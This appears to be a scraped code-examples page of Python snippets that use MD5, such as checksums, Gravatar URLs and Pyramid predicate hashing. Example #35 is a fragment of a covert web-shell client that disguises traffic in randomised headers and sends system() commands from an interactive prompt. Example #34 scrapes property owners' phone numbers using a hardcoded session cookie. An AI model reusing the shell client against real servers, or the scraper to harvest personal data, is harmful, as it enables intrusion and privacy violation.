                        head_seg_resp.headers.get('X-Static-Large-Object')):
                    seg_data['sub_slo'] = True
                data_for_storage.append(seg_data)

            else:
                problem_segments.append(
                    [quote(obj_name), head_seg_resp.status])
        if problem_segments:
            resp_body = get_response_body(out_content_type, {},
                                          problem_segments)
            raise HTTPBadRequest(resp_body, content_type=out_content_type)
        env = req.environ

        if not env.get('CONTENT_TYPE'):
            guessed_type, _junk = mimetypes.guess_type(req.path_info)
            env['CONTENT_TYPE'] = guessed_type or 'application/octet-stream'
        env['swift.content_type_overridden'] = True
        env['CONTENT_TYPE'] += ";swift_bytes=%d" % total_size
        env['HTTP_X_STATIC_LARGE_OBJECT'] = 'True'
        json_data = json.dumps(data_for_storage)
        env['CONTENT_LENGTH'] = str(len(json_data))
        env['wsgi.input'] = StringIO(json_data)

        slo_put_context = SloPutContext(self, slo_etag)
        return slo_put_context.handle_slo_put(req, start_response)
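For reference, the manifest body that parse_input consumes above is a JSON list of segment descriptors with 'path', 'etag' and 'size_bytes' keys. A hedged sketch of a client-side body (container, object names and sizes are hypothetical):

import json

manifest = [
    {'path': '/segments/seg_01',
     'etag': 'd41d8cd98f00b204e9800998ecf8427e',  # placeholder md5 of the segment body
     'size_bytes': 1048576},
    {'path': '/segments/seg_02',
     'etag': 'd41d8cd98f00b204e9800998ecf8427e',
     'size_bytes': 1048576},
]
body = json.dumps(manifest)  # sent as the PUT body with ?multipart-manifest=put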
Example #34
def main(htmlstring, driver):
    table_name = "maricopa_30_08_2020"

    header = {
                'accept': '*/*',
                'accept-encoding': 'gzip, deflate, br',
                'accept-language': 'en-US,en;q=0.9,ko;q=0.8',
                'cookie' : 'zguid=23|%2410ab80e6-80db-4e0a-9f70-2449ca972d74; _ga=GA1.2.759159145.1599348167; zjs_user_id=null; zjs_anonymous_id=%2210ab80e6-80db-4e0a-9f70-2449ca972d74%22; _gcl_au=1.1.607943717.1599348169; _pxvid=be9ff2f0-efce-11ea-9652-0242ac12000b; __gads=ID=cab593cad6cbce43:T=1599348200:S=ALNI_MaFYrYCZZvPIITKUEoEDXGvXSRYwQ; _gid=GA1.2.1287304564.1599556314; _pin_unauth=dWlkPU9EUXdZamxrTldJdE9ESTBNUzAwWXprMExXSXdNekl0TkdWak0yWTFNVEE1TldJeSZycD1abUZzYzJV; ki_r=; ki_s=; _fbp=fb.1.1599562363584.1440832488; g_state={"i_p":1599570378147,"i_l":1}; ki_t=1599556892885%3B1599556892885%3B1599563330503%3B1%3B19; JSESSIONID=62F47C1DAFBF00B3DB7B301BEA3E6586; zgsession=1|8840c1ee-f8a6-43d7-9a7b-3169df33c987; _pxff_cc=U2FtZVNpdGU9TGF4Ow==; _pxff_rf=1; _pxff_fp=1; _pxff_bsco=1; _px3=6d722620cec81d0df86c8eff4b631bdd93cef163fb0a14808e80f81013747454:M7trNae6CpAztMArZT97P3Vy9jFLz9FuEZ5p2efYpXeqOJC7Bw+xzsVGxArAYe+PM+vQKNuEI3qytjutx2UEXg==:1000:M1Vo/kdU1lI8Zqky6jJnuwSu45xHxX8ueCLKUiW6KX8rNR+VWAORLQi+1ns4dhilOU7gSCJfJmToj1SeyKN49kHZQZIQ0wSFeFtn+txzkIo/fhFAr2Cq7WvjCVWw7GBx8F3JIjMqHf1BZAAFg0YXqy/IVuCFhvIioSyK35nkm4A=; _gat=1; KruxPixel=true; DoubleClickSession=true; _uetsid=f44fc66ca5c392a6859170ed776b6ae9; _uetvid=dc708dafb2b6d91ab6c6923ac1ae6673; AWSALB=3gLhoP6QCdmf4zskymQ7ej/kbqzRHNkv+QNQMFmS6Y7S9pENaOusdnQVhFHWm1W9z8/1Og/WmO8JK63ys0wmi6ZNwRc4SN8lf4pcoyrm+nj8lLAPLRDIqMaYAEte; AWSALBCORS=3gLhoP6QCdmf4zskymQ7ej/kbqzRHNkv+QNQMFmS6Y7S9pENaOusdnQVhFHWm1W9z8/1Og/WmO8JK63ys0wmi6ZNwRc4SN8lf4pcoyrm+nj8lLAPLRDIqMaYAEte; search=6|1602203173818%7Crb%3DMaricopa%252C-AZ%26rect%3D33.203401%252C-111.882231%252C32.788612%252C-112.512953%26disp%3Dmap%26mdm%3Dauto%26sort%3Ddays%26pt%3Dpmf%252Cpf%26fs%3D1%26fr%3D0%26rs%3D0%26ah%3D0%26singlestory%3D0%26abo%3D0%26garage%3D0%26pool%3D0%26ac%3D0%26waterfront%3D0%26finished%3D0%26unfinished%3D0%26cityview%3D0%26mountainview%3D0%26parkview%3D0%26waterview%3D0%26hoadata%3D1%26zillow-owned%3D0%263dhome%3D0%09%0932697%09%09%09%09%09%09',
                'sec-fetch-dest': 'empty',
                'sec-fetch-mode': 'cors',
                'sec-fetch-site': 'same-origin',
                'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'
            }
    
    pagination = ""
    usersSearchTerm = "85263"
    west = "-111.7398158178711"
    east = "-111.63063918212892"
    south = "33.683945743230794"
    north = "33.802992604350585"
    regionId = "94855"
    regionType = "7"
    mapZoom = "13"
    includeList = "true"

    # https://www.zillow.com/search/GetSearchPageState.htm?searchQueryState={%22pagination%22:{},%22usersSearchTerm%22:%2285006%22,%22mapBounds%22:{%22west%22:-112.07973577801513,%22east%22:-112.01665022198486,%22south%22:33.43522122804253,%22north%22:33.494937169247144},%22regionSelection%22:[{%22regionId%22:94722,%22regionType%22:7}],%22isMapVisible%22:true,%22mapZoom%22:14,%22filterState%22:{%22sort%22:{%22value%22:%22globalrelevanceex%22}},%22isListVisible%22:true}&includeMap=false&includeList=true

    default_first_url = 'https://www.zillow.com/search/GetSearchPageState.htm?searchQueryState={"pagination":{0},"usersSearchTerm":"{1}","mapBounds":{"west":{2},"east":{3},"south":{4},"north":{5}},"regionSelection":[{"regionId":{6},"regionType":{7}}],"isMapVisible":true,"mapZoom":{8},"filterState":{"sort":{"value":"globalrelevanceex"}},"isListVisible":true}&includeMap=false&includeList={9}'


    first_case_url = 'https://www.zillow.com/search/GetSearchPageState.htm?searchQueryState={"pagination":{' + pagination + '},' + '"usersSearchTerm":"' + usersSearchTerm + '","mapBounds":{"west":' + west + ',"east":' + east + ',"south":' + south + ',"north":' + north + '},"regionSelection":[{"regionId":' + regionId + ',"regionType":' + regionType + '}],"isMapVisible":true,"mapZoom":' + mapZoom + ',"filterState":{"sort":{"value":"globalrelevanceex"}},"isListVisible":true}&includeMap=false&includeList=' + includeList
    

    # first_url = default_first_url.format(pagination, usersSearchTerm, west, east, south, north, regionId, regionType, mapZoom, includeList)
    print(first_case_url)
    # return
    
    default_page_url = 'https://www.zillow.com/search/GetSearchPageState.htm?searchQueryState={"pagination":{"currentPage":' + pagination + '},' + '"usersSearchTerm":"' + usersSearchTerm + '","mapBounds":{"west":' + west + ',"east":' + east + ',"south":' + south + ',"north":' + north + '},"regionSelection":[{"regionId":' + regionId + ',"regionType":' + regionType + '}],"isMapVisible":true,"mapZoom":' + mapZoom + ',"filterState":{"sort":{"value":"globalrelevanceex"}},"isListVisible":true}&includeMap=false&includeList=' + includeList

    counts = 1

    for page in range(1, 6):

        default_page_url = 'https://www.zillow.com/search/GetSearchPageState.htm?searchQueryState={"pagination":{"currentPage":' + str(page) + '},' + '"usersSearchTerm":"' + usersSearchTerm + '","mapBounds":{"west":' + west + ',"east":' + east + ',"south":' + south + ',"north":' + north + '},"regionSelection":[{"regionId":' + regionId + ',"regionType":' + regionType + '}],"isMapVisible":true,"mapZoom":' + mapZoom + ',"filterState":{"sort":{"value":"globalrelevanceex"}},"isListVisible":true}&includeMap=false&includeList=' + includeList

        if page == 1:
            url = first_case_url
        else:
            url = default_page_url

        response = requests.get(url, headers=header)
        result = response.json()
        properties_infos = result["searchResults"]["listResults"]
        print(len(properties_infos))

        for i in range(0, len(properties_infos)):
            data_base = []
            property_url = properties_infos[i]["detailUrl"]
            status_text = properties_infos[i]["statusText"]
            print(status_text, counts)
            counts += 1
            try:
                street_add = properties_infos[i]["hdpData"]["homeInfo"]["streetAddress"]
            except:
                street_add = ""
            
            try:
                city = properties_infos[i]["hdpData"]["homeInfo"]["city"]
            except:
                city = ""
            
            try:
                state = properties_infos[i]["hdpData"]["homeInfo"]["state"]
            except:
                state = ""
            
            try:
                zipcode = properties_infos[i]["hdpData"]["homeInfo"]["zipcode"]
            except:
                zipcode = ""
        
            property_address = street_add + ", " + city + ", " + state + " " + zipcode
            
            
            try:
                bathrooms = properties_infos[i]["hdpData"]["homeInfo"]["bathrooms"]
            except:
                bathrooms = ""
                
            try:
                bedrooms = properties_infos[i]["hdpData"]["homeInfo"]["bedrooms"]
            except:
                bedrooms = ""
            
            try:
                tax_assessed_value = properties_infos[i]["hdpData"]["homeInfo"]["taxAssessedValue"]
            except:
                tax_assessed_value = ""
                
            try:
                zestimate = properties_infos[i]["hdpData"]["homeInfo"]["zestimate"]
            except:
                zestimate = ""
                
            try:
                rent_zestimate = properties_infos[i]["hdpData"]["homeInfo"]["rentZestimate"]
            except:
                rent_zestimate = ""
                
            try:
                home_type = properties_infos[i]["hdpData"]["homeInfo"]["homeType"]
            except:
                home_type = ""
                
                
            if "by owner" in status_text:
                print("--------------------------------------------------> : ", i + 1)
                


                driver.get(property_url)
                time.sleep(10)
                
                try:
                    wait(driver, "//ul[@class='ds-home-fact-list']")
                except:
                    print("There is no xpath")
               
                # street_add = driver.find_element_by_xpath("//h1[@class='ds-address-container']/span[1]").text
                # property_address = street_add + ", " + city + ", " + state + " " + zipcode

                # phone_number = driver.find_element_by_xpath("//span[@class='listing-field']").text
                phones = re.findall(r'[(][\d]{3}[)][ ]?[\d]{3}-[\d]{4}', driver.page_source)
                for phone in range(1, len(phones) + 1):
                    phone_number = phones[phone - 1]
                    
                features_labels = driver.find_elements_by_xpath("//ul[@class='ds-home-fact-list']//span[contains(@class, 'ds-standard-label') and contains(@class, 'ds-home-fact-label')]")
                features_infos = driver.find_elements_by_xpath("//ul[@class='ds-home-fact-list']//span[contains(@class, 'ds-body') and contains(@class, 'ds-home-fact-value')]")
                
                parking = ""
                year_built = ""
                hoa = ""
                heating = ""
                lot = ""
                cooling = ""
                price_sqft = ""
                
                for feature_label, feature_info in zip(features_labels, features_infos):
                    feature_label_txt = feature_label.text
                    
                    if 'Parking' in feature_label_txt:
                        parking = feature_info.text
                    elif 'Year built' in feature_label_txt:
                        year_built = feature_info.text
                    elif 'HOA' in feature_label_txt:
                        hoa = feature_info.text
                    elif 'Heating' in feature_label_txt:
                        heating = feature_info.text
                    elif 'Lot' in feature_label_txt:
                        lot = feature_info.text
                    elif 'Cooling' in feature_label_txt:
                        cooling = feature_info.text
                    elif 'Price/' in feature_label_txt:
                        price_sqft = feature_info.text
                        
                
                    
                print("Property Address--------------------> : ", property_address)
                print("Property Url------------------------> : ", property_url)
                print("Property Status---------------------> : ", status_text)    
                print("Owner Phone Number------------------> : ", phone_number)
                print("BathRooms---------------------------> : ", bathrooms)
                print("BedRooms----------------------------> : ", bedrooms)
                print("Tax Assessed Value------------------> : ", tax_assessed_value)
                print("Zestimate---------------------------> : ", zestimate)
                print("Rent Zestimate----------------------> : ", rent_zestimate)
                print("Home Type---------------------------> : ", home_type)
                print("Parking-----------------------------> : ", parking)
                print("Year Built--------------------------> : ", year_built)
                print("HOA---------------------------------> : ", hoa)
                print("Heating-----------------------------> : ", heating)
                print("Lot---------------------------------> : ", lot)
                print("Cooling-----------------------------> : ", cooling)
                print("Price Sqft--------------------------> : ", price_sqft)
                
               

                string_id = property_address + status_text + phone_number
                m = hashlib.md5()
                m.update(string_id.encode('utf8'))
                identifier = m.hexdigest()
                print("hash-------------------->", identifier)
                create_time = str(datetime.datetime.now())
                update_time = ""

                insertdb = InsertDB()
                data_base.append((property_address, street_add, city, state, zipcode, status_text, phone_number, bathrooms, bedrooms, tax_assessed_value, zestimate, rent_zestimate, home_type, parking, year_built, hoa, heating, lot, cooling, price_sqft, identifier, create_time, update_time))
                insertdb.insert_document(data_base, table_name)
Example #35
# Each session produces a fresh random Accept-Language header
langTmp = choicePart(languages, 3)  # a list containing three Accept-Language templates
indexes = sorted(choicePart(range(1, 10), 3),
                 reverse=True)  # three weight values sorted in descending order, e.g. [8, 6, 4]

acceptLang = [defaultLang]  # add the default language first
for i in xrange(3):
    acceptLang.append(langTmp[i] %
                      (indexes[i], ))  # then append the three Accept-Language entries with their weights
acceptLangStr = ','.join(acceptLang)  # join the Accept-Language values with ","
# acceptLangStr is the Accept-Language header that will be used
debugPrint(acceptLangStr)

init2Char = acceptLang[0][0] + acceptLang[1][0]  # $i
md5head = (md5(init2Char + keyh).hexdigest())[0:3]  # $h
md5tail = (md5(init2Char + keyf).hexdigest())[0:3] + randAlpha(randint(
    3, 8))  # $f plus a padding string
debugPrint('$i is %s' % (init2Char))
debugPrint('md5 head: %s' % (md5head, ))
debugPrint('md5 tail: %s' % (md5tail, ))

# Interactive shell
cmd = "system('" + raw_input('shell > ') + "');"
while cmd != '':
    # pad with some unrelated data before the payload is written
    query = []
    for i in xrange(max(indexes) + 1 + randint(0, 2)):
        key = randAlpha(randint(3, 6))
        value = base64.urlsafe_b64encode(randBytesFlow(randint(3, 12)))
        query.append((key, value))  # generate the filler data and append it
Example #36
 def gen_device_id(self):
     return "android-{}".format(
         hashlib.md5(self.gen_uuid().encode("utf-8")).hexdigest()[:16])
Example #37
 def tokenMaker(self):
     m = md5()
     m.update((str(time.time())+self.account).encode("utf-8"))
     token = m.hexdigest()
     return token
Example #38
 def _get_cache_key(self):
     return 'access_token_' + hashlib.md5(
         self.cred.refresh_token.encode('utf-8')).hexdigest()
Example #39
 def __init__(self, euid: str):
     key: bytes = hashlib.md5(f"Salus-{euid.lower()}".encode("utf-8")).digest() + bytes([0] * 16)
     self.cipher = Cipher(algorithms.AES(key), modes.CBC(self.iv), default_backend())
Example #40
def get_unique_str():
    uuid_str = str(uuid.uuid4()).encode('utf-8')
    md5 = hashlib.md5()
    md5.update(uuid_str)
    return md5.hexdigest()
Example #41
 def avatar(self, size):
     digest = md5(self.email.lower().encode('utf-8')).hexdigest()
     return f'https://www.gravatar.com/avatar/{digest}?d=identicon&s={size}'
Example #42
def md5(alpha):
    return hashlib.md5(alpha.encode('utf-8')).hexdigest()
Example #43
def get_md5(pw):
    md5 = hashlib.md5(pw.encode(encoding='utf-8'))
    return md5.hexdigest()
Example #44
import io
import hashlib
import json


# file_content = b"testingtesting"
# file_content = b"testingtesting1"
# file_content = b"testingtesting2"
# file_content = b"testingtesting3"
# file_content = b"testingtesting4"
# FILE_CONTENT = b"testingtesting5"
# FILE_CONTENT = b"testingtesting6"
# FILE_CONTENT = b"testingtesting7"
FILE_CONTENT = b"testingtesting8"
FILE_HASH = hashlib.md5(FILE_CONTENT).hexdigest()


def test_home_page(test_client):
    """
    Testing the home page
    """
    response = test_client.get('/')
    assert response.status_code == 200


def test_upload(test_client):
    """
    Testing the POST request method
    """
    data = {
        # The original snippet is truncated here; a hypothetical completion
        # built from the constants above, using Flask's test client API:
        'file': (io.BytesIO(FILE_CONTENT), 'test.txt'),
    }
    response = test_client.post('/upload', data=data,  # hypothetical endpoint
                                content_type='multipart/form-data')
    assert response.status_code == 200
Example #45
def make_predicates(xhr=None,
                    request_method=None,
                    path_info=None,
                    request_param=None,
                    match_param=None,
                    header=None,
                    accept=None,
                    containment=None,
                    request_type=None,
                    traverse=None,
                    custom=()):

    # PREDICATES
    # ----------
    #
    # Given an argument list, a predicate list is computed.
    # Predicates are added to a predicate list in (presumed)
    # computation expense order.  All predicates associated with a
    # view or route must evaluate true for the view or route to
    # "match" during a request.  Elsewhere in the code, we evaluate
    # predicates using a generator expression.  The fastest predicate
    # should be evaluated first, then the next fastest, and so on, as
    # if one returns false, the remainder of the predicates won't need
    # to be evaluated.
    #
    # While we compute predicates, we also compute a predicate hash
    # (aka phash) that can be used by a caller to identify identical
    # predicate lists.
    #
    # ORDERING
    # --------
    #
    # A "order" is computed for the predicate list.  An order is
    # a scoring.
    #
    # Each predicate is associated with a weight value, which is a
    # power of 2.  The weight of a predicate symbolizes the
    # relative potential "importance" of the predicate to all other
    # predicates.  A larger weight indicates greater importance.
    #
    # All weights for a given predicate list are bitwise ORed together
    # to create a "score"; this score is then subtracted from
    # MAX_ORDER and divided by an integer representing the number of
    # predicates+1 to determine the order.
    #
    # The order represents the ordering in which a "multiview" ( a
    # collection of views that share the same context/request/name
    # triad but differ in other ways via predicates) will attempt to
    # call its set of views.  Views with lower orders will be tried
    # first.  The intent is to a) ensure that views with more
    # predicates are always evaluated before views with fewer
    # predicates and b) to ensure a stable call ordering of views that
    # share the same number of predicates.  Views which do not have
    # any predicates get an order of MAX_ORDER, meaning that they will
    # be tried very last.
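    #
    # A worked example of the arithmetic above (weights taken from the
    # assignments below): a view with only ``xhr`` and ``request_method``
    # predicates scores (1 << 1) | (1 << 2) == 6, so its order is
    # (MAX_ORDER - 6) / 3 -- lower, and therefore tried earlier, than a
    # view with no predicates, whose order is MAX_ORDER.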

    predicates = []
    weights = []
    h = md5()

    if xhr:

        def xhr_predicate(context, request):
            return request.is_xhr

        xhr_predicate.__text__ = "xhr = True"
        weights.append(1 << 1)
        predicates.append(xhr_predicate)
        h.update(bytes_('xhr:%r' % bool(xhr)))

    if request_method is not None:
        if not is_nonstr_iter(request_method):
            request_method = (request_method, )
        request_method = sorted(request_method)

        def request_method_predicate(context, request):
            return request.method in request_method

        text = "request method = %s" % repr(request_method)
        request_method_predicate.__text__ = text
        weights.append(1 << 2)
        predicates.append(request_method_predicate)
        for m in request_method:
            h.update(bytes_('request_method:%r' % m))

    if path_info is not None:
        try:
            path_info_val = re.compile(path_info)
        except re.error as why:
            raise ConfigurationError(why.args[0])

        def path_info_predicate(context, request):
            return path_info_val.match(request.path_info) is not None

        text = "path_info = %s"
        path_info_predicate.__text__ = text % path_info
        weights.append(1 << 3)
        predicates.append(path_info_predicate)
        h.update(bytes_('path_info:%r' % path_info))

    if request_param is not None:
        request_param_val = None
        if '=' in request_param:
            request_param, request_param_val = request_param.split('=', 1)
        if request_param_val is None:
            text = "request_param %s" % request_param
        else:
            text = "request_param %s = %s" % (request_param, request_param_val)

        def request_param_predicate(context, request):
            if request_param_val is None:
                return request_param in request.params
            return request.params.get(request_param) == request_param_val

        request_param_predicate.__text__ = text
        weights.append(1 << 4)
        predicates.append(request_param_predicate)
        h.update(
            bytes_('request_param:%r=%r' % (request_param, request_param_val)))

    if header is not None:
        header_name = header
        header_val = None
        if ':' in header:
            header_name, header_val = header.split(':', 1)
            try:
                header_val = re.compile(header_val)
            except re.error as why:
                raise ConfigurationError(why.args[0])
        if header_val is None:
            text = "header %s" % header_name
        else:
            text = "header %s = %s" % (header_name, header_val)

        def header_predicate(context, request):
            if header_val is None:
                return header_name in request.headers
            val = request.headers.get(header_name)
            if val is None:
                return False
            return header_val.match(val) is not None

        header_predicate.__text__ = text
        weights.append(1 << 5)
        predicates.append(header_predicate)
        h.update(bytes_('header:%r=%r' % (header_name, header_val)))

    if accept is not None:

        def accept_predicate(context, request):
            return accept in request.accept

        accept_predicate.__text__ = "accept = %s" % accept
        weights.append(1 << 6)
        predicates.append(accept_predicate)
        h.update(bytes_('accept:%r' % accept))

    if containment is not None:

        def containment_predicate(context, request):
            return find_interface(context, containment) is not None

        containment_predicate.__text__ = "containment = %s" % containment
        weights.append(1 << 7)
        predicates.append(containment_predicate)
        h.update(bytes_('containment:%r' % hash(containment)))

    if request_type is not None:

        def request_type_predicate(context, request):
            return request_type.providedBy(request)

        text = "request_type = %s"
        request_type_predicate.__text__ = text % request_type
        weights.append(1 << 8)
        predicates.append(request_type_predicate)
        h.update(bytes_('request_type:%r' % hash(request_type)))

    if match_param is not None:
        if isinstance(match_param, string_types):
            match_param, match_param_val = match_param.split('=', 1)
            match_param = {match_param: match_param_val}
        text = "match_param %s" % match_param

        def match_param_predicate(context, request):
            for k, v in match_param.items():
                if request.matchdict.get(k) != v:
                    return False
            return True

        match_param_predicate.__text__ = text
        weights.append(1 << 9)
        predicates.append(match_param_predicate)
        h.update(bytes_('match_param:%r' % match_param))

    if custom:
        for num, predicate in enumerate(custom):
            if getattr(predicate, '__text__', None) is None:
                text = '<unknown custom predicate>'
                try:
                    predicate.__text__ = text
                except AttributeError:
                    # if this happens the predicate is probably a classmethod
                    if hasattr(predicate, '__func__'):
                        predicate.__func__.__text__ = text
                    else:  # pragma: no cover ; 2.5 doesn't have __func__
                        predicate.im_func.__text__ = text
            predicates.append(predicate)
            # using hash() here rather than id() is intentional: we
            # want to allow custom predicates that are part of
            # frameworks to be able to define custom __hash__
            # functions for custom predicates, so that the hash output
            # of predicate instances which are "logically the same"
            # may compare equal.
            h.update(bytes_('custom%s:%r' % (num, hash(predicate))))
        weights.append(1 << 10)

    if traverse is not None:
        # ``traverse`` can only be used as a *route* "predicate"; it
        # adds 'traverse' to the matchdict if it's specified in the
        # routing args.  This causes the ResourceTreeTraverser to use
        # the resolved traverse pattern as the traversal path.
        from pyramid.urldispatch import _compile_route
        _, tgenerate = _compile_route(traverse)

        def traverse_predicate(context, request):
            if 'traverse' in context:
                return True
            m = context['match']
            tvalue = tgenerate(m)
            m['traverse'] = traversal_path_info(tvalue)
            return True

        # This isn't actually a predicate; it's just an infodict
        # modifier that injects ``traverse`` into the matchdict.  As a
        # result, the ``traverse_predicate`` function above always
        # returns True, and we don't need to update the hash or attach
        # a weight to it.
        predicates.append(traverse_predicate)

    score = 0
    for bit in weights:
        score = score | bit
    order = (MAX_ORDER - score) / (len(predicates) + 1)
    phash = h.hexdigest()
    return order, predicates, phash
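To make the weight/score/order comment at the top of this example concrete, here is a minimal sketch (not part of the original module, simplified to one weight per predicate):

# Simplified sketch of the score/order arithmetic described above.
MAX_ORDER = 1 << 30  # same constant this module defines (see Пример #50)

def order_for(weights):
    score = 0
    for bit in weights:      # each weight is a distinct power-of-2 bit,
        score = score | bit  # so ORing them just accumulates the set bits
    return (MAX_ORDER - score) / (len(weights) + 1)

# Two predicates (xhr + request_method, weights 1 << 1 and 1 << 2) produce a
# higher score and therefore a lower order than a lone xhr predicate, so the
# more specific view is tried first:
assert order_for([1 << 1, 1 << 2]) < order_for([1 << 1])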
Пример #46
0
import hashlib

def GetUniqueHashFromString(string_):
    return hashlib.md5(string_.encode('utf-8')).hexdigest()
Пример #47
0
from hashlib import md5

def gravatar_url(email, size=80):
    """Return the Gravatar image URL for the given email address."""
    return 'http://www.gravatar.com/avatar/%s?d=identicon&s=%d' % \
        (md5(email.strip().lower().encode('utf-8')).hexdigest(), size)
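A quick sanity check (hypothetical addresses, not from the original): stripping and lowercasing canonicalizes the address before hashing, so differently-formatted spellings map to the same Gravatar URL.

assert gravatar_url(' Jane.Doe@Example.COM ') == gravatar_url('jane.doe@example.com')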
Пример #48
0
import hashlib

def get_md5(file_path):
    hasher = hashlib.md5()  # renamed from ``hash`` to avoid shadowing the builtin
    with open(file_path, "rb") as f:
        for chunk in iter(lambda: f.read(4096), b""):
            hasher.update(chunk)
    return hasher.hexdigest()
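A short usage sketch (the path is illustrative): reading in fixed 4 KiB chunks keeps memory use flat regardless of file size, unlike hashing f.read() in one go.

digest = get_md5('/tmp/example.bin')  # hypothetical file
print(digest)  # 32-character hex string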
Пример #49
0
from hashlib import md5

def avatar(self, size):
    # Instance method, e.g. on a User model exposing an ``email`` attribute.
    digest = md5(self.email.lower().encode('utf-8')).hexdigest()
    return 'https://www.gravatar.com/avatar/{}?d=identicon&s={}'.format(
        digest, size)
Пример #50
0
from pyramid.compat import (
    string_types,
    bytes_,
    is_nonstr_iter,
)

from pyramid.exceptions import ConfigurationError

from pyramid.traversal import (
    find_interface,
    traversal_path_info,
)

from zope.interface import implementer

from pyramid.interfaces import IActionInfo

from hashlib import md5

MAX_ORDER = 1 << 30
DEFAULT_PHASH = md5().hexdigest()


@implementer(IActionInfo)
class ActionInfo(object):
    def __init__(self, file, line, function, src):
        self.file = file
        self.line = line
        self.function = function
        self.src = src

    def __str__(self):
        srclines = self.src.split('\n')
        src = '\n'.join('    %s' % x for x in srclines)
        return 'Line %s of file %s:\n%s' % (self.line, self.file, src)
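A small illustration (file, line and source values are made up) of how __str__ indents the captured source under a location header:

info = ActionInfo('demo.py', 12, 'setup', 'config.add_view(my_view)\nconfig.commit()')
print(str(info))
# Line 12 of file demo.py:
#     config.add_view(my_view)
#     config.commit()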
Пример #51
0
import hashlib

def __calculate_md5(self, fpath, chunk_size=1024 * 1024):  # pylint: disable=no-self-use
    md5 = hashlib.md5()
    with open(fpath, 'rb') as f:
        for chunk in iter(lambda: f.read(chunk_size), b''):
            md5.update(chunk)
    return md5.hexdigest()
Пример #52
0
import hashlib

def get_md5(url):
    if isinstance(url, str):
        url = url.encode('utf-8')
    m = hashlib.md5()
    m.update(url)
    return m.hexdigest()
Пример #53
0
import os
import time
import hashlib

import requests
from bs4 import BeautifulSoup

# FIXLET_LIMIT, FIXLET_HASH_FILE_PATH, CACHE_TIME and the helpers
# scrub_fixlet(), read_fixlet_hashes() and save_fixlet_hashes() are
# defined elsewhere in the original script.


def copy_site(auth, server, secureSSL, source_site, destination_site, get):
    """Perform the actual copy of content (fixlets) from the SOURCE
    site to the DEST site."""

    # find fixlet candidates to copy
    print "Finding copy candidates from SOURCE."
    r = get(server + 'api/fixlets/%s/%s' % (source_site[1], source_site[0]))
    r = BeautifulSoup(r.text)

    fixlets = []
    for fixlet in r.find_all('fixlet'):
        if len(fixlets) > FIXLET_LIMIT:
            break
        fixlets.append(
            (fixlet.find('name').text, fixlet['resource'], fixlet.id.text))

    # find fixlets already on dest
    dest_fixlets_hash = dict()
    if os.path.isfile(FIXLET_HASH_FILE_PATH) and \
            os.path.getmtime(FIXLET_HASH_FILE_PATH) + CACHE_TIME > time.time():
        # use our fixlet hashes cache!
        dest_fixlets_hash = read_fixlet_hashes()

    if not dest_fixlets_hash:  # read_fixlet_hashes() found an empty file, or no cache existed
        print "Enumerating existing fixlets on DEST."
        r = get(server + 'api/fixlets/%s/%s' %
                (destination_site[1], destination_site[0]))
        r = BeautifulSoup(r.text)

        dest_fixlets = []
        for fixlet in r.find_all('fixlet'):
            dest_fixlets.append(
                (fixlet.find('name').text, fixlet['resource'], fixlet.id.text))

        # Map scrubbed-content hash -> fixlet ID; storing hashes rather than
        # full fixlet bodies keeps memory usage low.
        dest_fixlets_hash = dict()
        fixlet_count = 0
        for fixlet_name, fixlet_url, fixlet_id in dest_fixlets:
            fixlet_count += 1
            if fixlet_count > FIXLET_LIMIT:
                break
            r = get(fixlet_url)

            # fixlets embed their own timestamps, so cut those out before
            # comparing for duplicates
            content_scrubbed = scrub_fixlet(r.content)

            fixlet_hash = hashlib.md5(content_scrubbed).hexdigest()
            if fixlet_hash in dest_fixlets_hash:
                # found a duplicate, delete it
                print "Found duplicate fixlets on DEST: ID", fixlet_id, \
                 "which duplicates", dest_fixlets_hash[fixlet_hash]
                print "Deleting duplicate..."
                deleter = requests.delete(fixlet_url,
                                          auth=auth,
                                          verify=secureSSL)
                if deleter.status_code != 200:
                    print "Unable to delete fixlet", fixlet_id, "!!"
            else:
                dest_fixlets_hash[fixlet_hash] = fixlet_id
    else:
        print "Using %s to check for existing fixlets." % FIXLET_HASH_FILE_PATH

    # copy the new fixlets from src to dest
    print "Begin copying fixlets."
    total_kib_copied = 0
    for fixlet_name, fixlet_url, fixlet_id in fixlets:
        r = get(fixlet_url)

        content_scrubbed = scrub_fixlet(r.content)
        fixlet_hash = hashlib.md5(content_scrubbed).hexdigest()

        if fixlet_hash in dest_fixlets_hash:
            # dest has this one already, skip it
            print "Found fixlet", fixlet_id, "from SOURCE already in DEST," \
             "skipping..."
            continue

        print "Copying", fixlet_id, ":", fixlet_name, repr(
            hashlib.md5(r.content).hexdigest())

        postr = requests.post(server + 'api/fixlets/%s/%s' %
                              (destination_site[1], destination_site[0]),  # /type/name
                              data=r.content,
                              auth=auth,
                              verify=secureSSL)
        postr = BeautifulSoup(postr.content)
        fixlet_dest_id = postr.find('id').text
        dest_fixlets_hash[fixlet_hash] = fixlet_dest_id

        kib = len(r.content) / 1024.0  # len(), not sys.getsizeof(): measure the payload itself
        print kib, "KiB copied"
        total_kib_copied += kib
    print total_kib_copied, "KiB in total copied"

    save_fixlet_hashes(dest_fixlets_hash)
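scrub_fixlet() is defined elsewhere in the original script; a plausible sketch of the idea, with element names that are guesses rather than BigFix API facts:

import re

def scrub_fixlet_sketch(content):
    # Hypothetical stand-in: drop timestamp-bearing XML elements so hashes of
    # otherwise-identical fixlets compare equal.
    return re.sub(br'<(Modified|SourceReleaseDate)>.*?</\1>', b'',
                  content, flags=re.DOTALL)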
Пример #54
0
from hashlib import md5

def _derive_key_and_iv(password, salt, key_length, iv_length):
    # OpenSSL's legacy EVP_BytesToKey scheme: chain MD5 over
    # (previous digest + password + salt) until enough bytes accumulate.
    d = d_i = b''
    while len(d) < key_length + iv_length:
        d_i = md5(d_i + password + salt).digest()
        d += d_i
    return d[:key_length], d[key_length:key_length + iv_length]
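This is OpenSSL's legacy EVP_BytesToKey construction with MD5. A usage sketch with made-up inputs, sized for AES-256-CBC:

password = b'correct horse'  # made-up secret
salt = b'12345678'           # openssl's `enc` uses an 8-byte salt
key, iv = _derive_key_and_iv(password, salt, key_length=32, iv_length=16)
assert len(key) == 32 and len(iv) == 16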
Пример #55
0
import asyncio
import os
import re
from hashlib import md5

import pytest

from yui.utils import json

from ...util import FakeBot

result_pattern_re = re.compile(
    r".+? 기준으로 가장 근접한 관측소의 \d{4}년 \d{2}월 \d{2}일 \d{2}시 계측 자료에요.\n\n"
    r"\* 종합 AQI: \d+(?:\.\d+)? - (?:좋음|보통|민감군 영향|나쁨|매우 나쁨|위험)\(.+?\)\n"
